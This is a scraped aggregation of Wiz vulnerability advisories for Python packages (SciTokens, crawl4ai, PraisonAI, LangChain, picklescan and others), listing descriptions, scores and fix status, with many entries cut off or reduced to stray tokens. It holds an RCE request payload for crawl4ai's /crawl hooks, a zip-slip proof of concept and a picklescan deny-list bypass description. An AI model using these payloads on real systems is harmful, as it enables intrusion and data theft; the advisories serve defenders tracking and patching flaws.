pip Severity HIGH Has Fix Added at: Apr 02, 2026
Nix Severity CRITICAL Has Fix Added at: Apr 02, 2026
Wiz
CVE-2026-32714 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8 [CRITICAL]
## CVE-2026-32714: Python vulnerability analysis and mitigation
SciTokens is a reference library for generating and using SciTokens. Prior to version 1.9.6, the KeyCache class in scitokens was vulnerable to SQL Injection because it used Python's str.format() to construct SQL queries with user-supplied data (such as issuer and key_id). This allowed an attacker to execute arbitrary SQL commands against the local SQLite database. This issue has been patched in version 1.9.6.
Source : NVD
## 9.8
Score
Published March 31, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.9
Exploitation Probability (EPSS) N/A
Affected pack
Wiz
GHSA-5hwf-rc88-82xm Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-5hwf-rc88-82xm Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-5hwf-rc88-82xm :
Python vulnerability analysis and mitigation
## Assessment
uuid
_osx_support
_aix_support
## Original report
## Summary
UNSAFE_IMPORTS
uuid
_osx_support
_aix_support
subprocess.Popen()
os.system()
UnsafeImports
NonStandardImports
## Affected Versions
fickling <= 0.1.8 (all versions)
## Details
## Missing Modules
UNSAFE_IMPORTS
uuid
_get_command_stdout(cmd, *args)
subprocess.Popen((cmd,) + args, stdout=PIPE, stderr=DEVNULL)
All platforms
_osx_support
_read_output(cmdstring)
os.system(cmd)
All platforms
_osx_support
_find_build_tool(toolname)
%s
_read_output("/usr/bin/xcrun -find %s" % toolname)
All platforms
_aix_support
_read_cmd_output(cmdstring)
os.system(cmd)
All platforms
_osx_support
_aix_support
## Why These P
Wiz
CVE-2026-33236 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-33236 [HIGH] CVE-2026-33236 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33236 :
Python vulnerability analysis and mitigation
subdir
id
../
Source : NVD
## 8.1
Score
Published March 20, 2026
Severity HIGH
CNA Score 8.1
Affected Technologies
Python
Wolfi
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
nltk
py3-nltk
Sources
NVD
Chainguard Has Fix Added at: Mar 26, 2026
Debian 11, 14 Severity HIGH No Fix Added at: Mar 21, 2026
Debian 12, 13 Severity MEDIUM No Fix Added at: Mar 21, 2026
Echo Severity HIGH No Fix Added at: Mar 21, 2026
pip Severity HIGH No Fix Added at: Mar 20, 2026
Wolfi Has Fix Added at: Mar 26, 2026
Wiz
CVE-2026-27622 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.4
CVE-2026-27622 [HIGH] CVE-2026-27622 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27622 :
Python vulnerability analysis and mitigation
OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In CompositeDeepScanLine::readPixels, per-pixel totals are accumulated in the vector total_sizes; for attacker-controlled large counts across many parts, total_sizes[ptr] wraps modulo 2^32. overall_sample_count is then derived from the wrapped totals and used in samples[channel].resize(overall_sample_count). Decode pointer setup/consumption proceeds with the true sample counts, and write operations in core unpack (generic_unpack_deep_pointers) overrun the undersized composite sample buffer. This vulnerability is fixed in v3.2.6, v3.3.8, and v3.4.6.
Source : NVD
## 8.4
Score
Published Marc
Wiz
GHSA-5882-5rx9-xgxp Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-5882-5rx9-xgxp Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-5882-5rx9-xgxp :
Python vulnerability analysis and mitigation
/crawl
hooks
exec()
__import__
POST /crawl
```json
{
  "urls": ["https://example.com"],
  "hooks": {
    "code": {
      "on_page_context_created": "async def hook(page, context, **kwargs):\n __import__('os').system('malicious_command')\n return page"
    }
  }
}
```
## Impact
An unauthenticated attacker can:
Execute arbitrary system commands
Read/write files on the server
Exfiltrate sensitive data (environment variables, API keys)
Pivot to internal network services
Completely compromise the server
## Mitigation
Upgrade to v0.8.0 (recommended)
Disable the Docker API
/crawl
Add authentication to the API
## Fix Details
__import__
allowed_builtins
hook_manager.py
CRAWL4AI_HOOKS_ENABLED=false
Users must explicitly opt-in to en
Wiz
CVE-2026-30242 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.5
CVE-2026-30242 [HIGH] CVE-2026-30242 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30242 :
Python vulnerability analysis and mitigation
Plane is an open-source project management tool. Prior to version 1.2.3, the webhook URL validation in plane/app/serializers/webhook.py only checks ip.is_loopback, allowing attackers with workspace ADMIN role to create webhooks pointing to private/internal network addresses (10.x.x.x, 172.16.x.x, 192.168.x.x, 169.254.169.254, etc.). When webhook events fire, the server makes requests to these internal addresses and stores the response — enabling SSRF with full response read-back. This issue has been patched in version 1.2.3.
Source : NVD
## 8.5
Score
Published March 6, 2026
Severity HIGH
CNA Score 8.5
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA K
Wiz
CVE-2025-69662 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2025-69662 [HIGH] CVE-2025-69662 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-69662 :
Python vulnerability analysis and mitigation
SQL injection vulnerability in geopandas before v1.1.2 allows an attacker to obtain sensitive information via the to_postgis() function used to write GeoDataFrames to a PostgreSQL database.
Source : NVD
## 8.6
Score
Published January 30, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Python
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
python-geopandas
geopandas
Sources
NVD
Debian 11, 12, 13 Severity HIGH No Fix Added at: Jan 30, 2026
Debian 14 Severity HIGH Has Fix Added at: Jan 30, 2026
Echo Severity HIGH No
Wiz
CVE-2026-33641 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-33641 [HIGH] CVE-2026-33641 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33641 :
Python vulnerability analysis and mitigation
Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.3, Glances supports dynamic configuration values in which substrings enclosed in backticks are executed as system commands during configuration parsing. This behavior occurs in Config.get_value() and is implemented without validation or restriction of the executed commands. If an attacker can modify or influence configuration files, arbitrary commands will execute automatically with the privileges of the Glances process during startup or configuration reload. In deployments where Glances runs with elevated privileges (e.g., as a system service), this may lead to privilege escalation. This issue has been patched in version 4.5.3.
Source :
Wiz
CVE-2026-23842 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-23842 [HIGH] CVE-2026-23842 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23842 :
Python vulnerability analysis and mitigation
ChatterBot is a machine learning, conversational dialog engine for creating chat bots. ChatterBot versions up to 1.2.10 are vulnerable to a denial-of-service condition caused by improper database session and connection pool management. Concurrent invocations of the get_response() method can exhaust the underlying SQLAlchemy connection pool, resulting in persistent service unavailability and requiring a manual restart to recover. Version 1.2.11 fixes the issue.
Source : NVD
## 7.5
Score
Published January 19, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.8
Wiz
CVE-2026-34953 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-34953 [CRITICAL] CVE-2026-34953 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34953 :
Python vulnerability analysis and mitigation
PraisonAI is a multi-agent teams system. Prior to version 4.5.97, OAuthManager.validate_token() returns True for any token not found in its internal store, which is empty by default. Any HTTP request to the MCP server with an arbitrary Bearer token is treated as authenticated, granting full access to all registered tools and agent capabilities. This issue has been patched in version 4.5.97.
Source : NVD
## 9.1
Score
Published April 3, 2026
Severity CRITICAL
CNA Score 9.1
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
p
Wiz
GHSA-5hr4-253g-cpx2 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-5hr4-253g-cpx2 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-5hr4-253g-cpx2 :
Python vulnerability analysis and mitigation
## Summary
## 6.9
Score
Published April 4, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
web3
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Apr 05, 2026
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CVE-2026-35615
CRITICAL
9.2
Python
praiso
Wiz
GHSA-4f84-67cv-qrv3 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-4f84-67cv-qrv3 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-4f84-67cv-qrv3 :
Python vulnerability analysis and mitigation
dydx-v4-client
exec()
dydx-v4-client
Source : NVD
## 9.3
Score
Published February 6, 2026
Severity CRITICAL
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
dydx-v4-client
Sources
NVD
pip Severity CRITICAL Has Fix Added at: Feb 08, 2026
Wiz
CVE-2026-4229 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
CVE-2026-4229 [CRITICAL] CVE-2026-4229 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4229 :
Python vulnerability analysis and mitigation
A flaw has been found in vanna-ai vanna up to 2.0.2. This impacts the function remove_training_data of the file src/vanna/legacy/google/bigquery_vector.py. This manipulation of the argument ID causes sql injection. The attack can be initiated remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
## 6.9
Score
Published March 16, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
vanna
So
Wiz
CVE-2026-25505 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-25505 [CRITICAL] CVE-2026-25505 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25505 :
Python vulnerability analysis and mitigation
Bambuddy is a self-hosted print archive and management system for Bambu Lab 3D printers. Prior to version 0.1.7, a hardcoded secret key used for signing JWTs is checked into source code and many API routes do not check authentication. This issue has been patched in version 0.1.7.
Source : NVD
## 9.8
Score
Published February 4, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 30.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
bambuddy
Sources
NVD
pip Severity CRITICAL Has Fix Added at: Feb 03, 2026
Wiz
CVE-2026-33175 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-33175 [HIGH] CVE-2026-33175 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33175 :
Python vulnerability analysis and mitigation
OAuthenticator is software that allows OAuth2 identity providers to be plugged in and used with JupyterHub. Prior to version 17.4.0, an authentication bypass vulnerability in oauthenticator allows an attacker with an unverified email address on an Auth0 tenant to log in to JupyterHub. When email is used as the username_claim, this gives users control over their username and the possibility of account takeover. This issue has been patched in version 17.4.0.
Source : NVD
## 8.8
Score
Published April 3, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 26.9
Ex
Wiz
CVE-2026-27794 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.6
CVE-2026-27794 [MEDIUM] CVE-2026-27794 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27794 :
Python vulnerability analysis and mitigation
BaseCache
CachePolicy
langgraph-checkpoint
BaseCache
JsonPlusSerializer(pickle_fallback=True)
pickle.loads(...)
cache=...
StateGraph.compile(...)
BaseCache
CachePolicy
Source : NVD
## 6.6
Score
Published February 25, 2026
Severity MEDIUM
CNA Score 6.6
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 57.5
Exploitation Probability (EPSS) 0.4
Affected packages and libraries
langgraph-checkpoint
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Mar 02, 2026
Wiz
CVE-2025-68398 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2025-68398 [CRITICAL] CVE-2025-68398 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68398 :
Python vulnerability analysis and mitigation
Weblate is a web based localization tool. In versions prior to 5.15.1, it was possible to overwrite Git configuration remotely and override some of its behavior. Version 5.15.1 fixes the issue.
Source : NVD
## 9.1
Score
Published December 18, 2025
Severity CRITICAL
CNA Score 9.1
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 46.9
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
weblate
Sources
NVD
pip Severity CRITICAL Has Fix Added at: Dec 21, 2025
Wiz
GHSA-q56x-g2fj-4rj6 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-q56x-g2fj-4rj6 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-q56x-g2fj-4rj6 :
Python vulnerability analysis and mitigation
## Summary
save_external_data
## Details
## TOCTOU
The vulnerable code pattern:
```python
# CHECK - Is this a file?
if not os.path.isfile(external_data_file_path):
    # Line 228-229: USE #1 - Create if it doesn't exist
    with open(external_data_file_path, "ab"):
        pass
# Open for writing
with open(external_data_file_path, "r+b") as data_file:
    # Lines 233-243: Write tensor data
    data_file.seek(0, 2)
    if info.offset is not None:
        file_size = data_file.tell()
        if info.offset > file_size:
            data_file.write(b"\0" * (info.offset - file_size))
        data_file.seek(info.offset)
    offset = data_file.tell()
    data_file.write(tensor.raw_data)
```
os.path.isfile
open
O_EXCL | O_CREAT
O_NOFOLLOW
## Bypass
C:\
if location_path.is_absolute() and len(
Wiz
CVE-2025-67748 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2025-67748 [HIGH] CVE-2025-67748 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67748 :
Python vulnerability analysis and mitigation
pty
pty.spawn()
LIKELY_SAFE
Source : NVD
## 7.1
Score
Published December 16, 2025
Severity HIGH
CNA Score 7.1
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
fickling
Sources
NVD
pip Severity HIGH Has Fix Added at: Dec 16, 2025
Wiz
CVE-2026-29038 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-29038 [MEDIUM] CVE-2026-29038 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29038 :
Python vulnerability analysis and mitigation
changedetection.io is a free open source web page change detection tool. Prior to version 0.54.4, there is a reflected cross-site scripting (XSS) vulnerability identified in the /rss/tag/ endpoint of changedetection.io. The tag_uuid path parameter is reflected directly in the HTTP response body without HTML escaping. Since Flask returns text/html by default for plain string responses, the browser parses and executes injected JavaScript. This issue has been patched in version 0.54.4.
Source : NVD
## 6.1
Score
Published March 6, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability P
Wiz
CVE-2026-34447 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-34447 [MEDIUM] CVE-2026-34447 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34447 :
Python vulnerability analysis and mitigation
Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. Prior to version 1.21.0, a symlink traversal vulnerability in external data loading allows reading files outside the model directory. This issue has been patched in version 1.21.0.
Source : NVD
## 5.5
Score
Published April 1, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
py3-onnx
onnx
Sources
NVD
Chainguard Has Fix Added at: Apr 05, 2026
Debian 11, 12, 13, 14 Severity M
Wiz
CVE-2026-26981 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-26981 [MEDIUM] CVE-2026-26981 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26981 :
Python vulnerability analysis and mitigation
istream_nonparallel_read
ImfContextInit.cpp
IStream
size_t
memcpy
Source : NVD
## 6.5
Score
Published February 24, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
openexr
mingw32-openexr-debuginfo
Sources
NVD
Alpine 3.21, 3.22, 3.23, edge Severity MEDIUM No Fix Added at: Mar 02, 2026
Chainguard Has Fix Added at: Mar 02, 2026
pip Severity MEDIUM Has Fix Added at: Apr 06, 2026
Homebrew Severity MEDIUM Has Fix Added at: Mar 03, 2026
Nix Severity MEDIUM Has Fix Added at
Wiz
CVE-2026-35187 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.7
CVE-2026-35187 [HIGH] CVE-2026-35187 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35187 :
Python vulnerability analysis and mitigation
pyLoad is a free and open-source download manager written in Python. In 0.5.0b3.dev96 and earlier, the parse_urls API function in src/pyload/core/api/__init__.py fetches arbitrary URLs server-side via get_url(url) (pycurl) without any URL validation, protocol restriction, or IP blacklist. An authenticated user with ADD permission can make HTTP/HTTPS requests to internal network resources and cloud metadata endpoints, read local files via the file:// protocol (pycurl reads the file server-side), interact with internal services via the gopher:// and dict:// protocols, and enumerate file existence via an error-based oracle (error 37 vs. empty response).
Source : NVD
## 7.7
Score
Published April 6, 2026
Severity HIGH
CNA Score 7.7
A
Wiz
CVE-2026-39308 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-39308 [HIGH] CVE-2026-39308 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39308 :
Python vulnerability analysis and mitigation
## Summary
manifest.json
name
version
../
400
## Details
The bug is caused by the order of operations between the HTTP handler and the registry storage layer.
RegistryServer._handle_publish()
src/praisonai/praisonai/recipe/server.py:370-426
POST /v1/recipes/{name}/{version}
.praison
result = self.registry.publish(tmp_path, force=force)
LocalRegistry.publish()
src/praisonai/praisonai/recipe/registry.py:214-287
manifest.json
name
version
```python
name = manifest.get("name")
version = manifest.get("version")
recipe_dir = self.recipes_path / name / version
recipe_dir.mkdir(parents=True, exist_ok=True)
bundle_name = f"{name}-{version}.praison"
dest_path = recipe_dir / bundle_name
shutil.copy2(bundle_path, dest_path)
```
Wiz
CVE-2026-4506 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
CVE-2026-4506 [CRITICAL] CVE-2026-4506 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4506 :
Python vulnerability analysis and mitigation
A vulnerability was found in Mindinventory MindSQL up to 0.2.1. Impacted is the function ask_db of the file mindsql/core/mindsql_core.py. Performing a manipulation results in code injection. The attack can be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
## 5.3
Score
Published March 20, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mindsql
Sources
NVD
pip Seve
Wiz
CVE-2026-2531 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-2531 [MEDIUM] CVE-2026-2531 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2531 :
Python vulnerability analysis and mitigation
A security vulnerability has been detected in MindsDB up to 25.14.1. This vulnerability affects the function clear_filename of the file mindsdb/utilities/security.py of the component File Upload. Such manipulation leads to server-side request forgery. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The name of the patch is 74d6f0fd4b630218519a700fbee1c05c7fd4b1ed. It is best practice to apply a patch to resolve this issue.
Source : NVD
## 5.3
Score
Published February 16, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentil
Wiz
CVE-2026-27982 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2026-27982 [MEDIUM] CVE-2026-27982 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27982 :
Python vulnerability analysis and mitigation
An open redirect vulnerability exists in django-allauth versions prior to 65.14.1 when SAML IdP initiated SSO is enabled (it is disabled by default), which may allow an attacker to redirect users to an arbitrary external website via a crafted URL.
Source : NVD
## 5.1
Score
Published March 5, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
Python
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
django-allauth
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Mar 08, 2026
Debian 14 Severity MEDIUM Has Fix Added at
Wiz
CVE-2025-33245 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.0
CVE-2025-33245 [HIGH] CVE-2025-33245 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-33245 :
Python vulnerability analysis and mitigation
NVIDIA NeMo Framework contains a vulnerability where malicious data could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.
Source : NVD
## 8.8
Score
Published February 18, 2026
Severity HIGH
CNA Score 8.0
Affected Technologies
Python
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 52.4
Exploitation Probability (EPSS) 0.3
Affected packages and libraries
nemo-toolkit
nemo
Sources
NVD
pip Severity HIGH Has Fix Added at: Feb 21, 2026
Nix Severity HIGH Has Fix Added at: Feb 24, 2026
Wiz
CVE-2026-28370 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-28370 [CRITICAL] CVE-2026-28370 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28370 :
Python vulnerability analysis and mitigation
In the query parser in OpenStack Vitrage before 12.0.1, 13.0.0, 14.0.0, and 15.0.0, a user allowed to access the Vitrage API may trigger code execution on the Vitrage service host as the user the Vitrage service runs under. This may result in unauthorized access to the host and further compromise of the Vitrage service. All deployments exposing the Vitrage API are affected. This occurs in _create_query_function in vitrage/graph/query.py.
Source : NVD
## 9.1
Score
Published February 27, 2026
Severity CRITICAL
CNA Score 9.1
Affected Technologies
Python
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8
Exploi
Wiz
CVE-2026-27641 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-27641 [CRITICAL] CVE-2026-27641 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27641 :
Python vulnerability analysis and mitigation
name
name
Source : NVD
## 9.8
Score
Published February 25, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 40.7
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
flask-reuploaded
Sources
NVD
pip Severity CRITICAL Has Fix Added at: Mar 02, 2026
Wiz
CVE-2026-34231 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-34231 [MEDIUM] CVE-2026-34231 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34231 :
Python vulnerability analysis and mitigation
Slippers is a UI component framework for Django. Prior to version 0.6.3, a Cross-Site Scripting (XSS) vulnerability exists in the {% attrs %} template tag of the slippers Django package. When a context variable containing untrusted data is passed to {% attrs %}, the value is interpolated into an HTML attribute string without escaping, allowing an attacker to break out of the attribute context and inject arbitrary HTML or JavaScript into the rendered page. This issue has been patched in version 0.6.3.
Source : NVD
## 6.1
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploit
Wiz
GHSA-84r2-jw7c-4r5q Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-84r2-jw7c-4r5q Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-84r2-jw7c-4r5q :
Python vulnerability analysis and mitigation
## Summary
Currently picklescanner only blocks some specific functions of the pydoc and operator modules. Attackers can use other functions within these allowed modules to go through undetected and achieve RCE on the final user. Particularly
pydoc.locate: Can dynamically resolve and import arbitrary modules (e.g., resolving the string "os" to the actual os module).
operator.methodcaller: Allows executing a method on an object. When combined with a resolved module object, it can execute functions like system. Since locate and methodcaller are not explicitly listed in the deny-list, picklescan treats them as "Safe" or "Suspicious" (depending on configuration) but does not flag them as "Dangerous", allowing the malicio
Wiz
CVE-2026-39307 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
CVE-2026-39307 [CRITICAL] CVE-2026-39307 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39307 :
Python vulnerability analysis and mitigation
zipfile.extractall()
## Details
src/praisonai/praisonai/cli/features/templates.py
zip_ref.extractall(tmpdir)
zip_ref.extractall(tmpdir)
../../../../tmp/evil.sh
extractall
## PoC
Generate a malicious zip payload:
```python
import zipfile
with zipfile.ZipFile('malicious_template.zip', 'w') as z:
    # Adding a file that traverses directories
    z.writestr('../../../../../../../tmp/zip_slip_pwned.txt', 'pwned by zip slip')
```
Trick a user into installing the malicious template:
praisonai templates install github:attacker/malicious_template
zip_slip_pwned.txt
/tmp/
## Impact
This is an Arbitrary File Write vulnerability affecting any user who installs community templates. It can be leveraged to overwrite system files, user dot
Wiz
CVE-2025-68664 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2025-68664 [CRITICAL] CVE-2025-68664 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68664 :
Python vulnerability analysis and mitigation
LangChain is a framework for building agents and LLM-powered applications. Prior to versions 0.3.81 and 1.2.5, a serialization injection vulnerability exists in LangChain's dumps() and dumpd() functions. The functions do not escape dictionaries with 'lc' keys when serializing free-form dictionaries. The 'lc' key is used internally by LangChain to mark serialized objects. When user-controlled data contains this key structure, it is treated as a legitimate LangChain object during deserialization rather than plain user data. This issue has been patched in versions 0.3.81 and 1.2.5.
| Field | Value |
|---|---|
| Source | NVD |
| Score | 8.2 |
| Published | December 23, 2025 |
| Severity | HIGH |
| CNA Score | 9.3 |
| High-profile Vulnerability | Yes |
| Affected Technologies | P |
## CVE-2026-25738 [MEDIUM] (CVSS 6.9): Impact, Exploitability, and Mitigation Steps | Wiz
Python vulnerability analysis and mitigation
`http_proxy`, `https_proxy`
| Field | Value |
|---|---|
| Source | NVD |
| Score | 6.9 |
| Published | February 19, 2026 |
| Severity | MEDIUM |
| CNA Score | 6.9 |
| Affected Technologies | Python |
| Has Public Exploit | No |
| Has CISA KEV Exploit | No |
